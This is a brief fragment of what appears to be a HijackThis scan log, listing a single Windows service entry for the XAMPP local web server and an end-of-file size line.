O23 - Service: XAMPP Service (XAMPP) - Unknown owner - c:\xampp\service.exe
--
End of file - 7811 bytes
|
|
|
|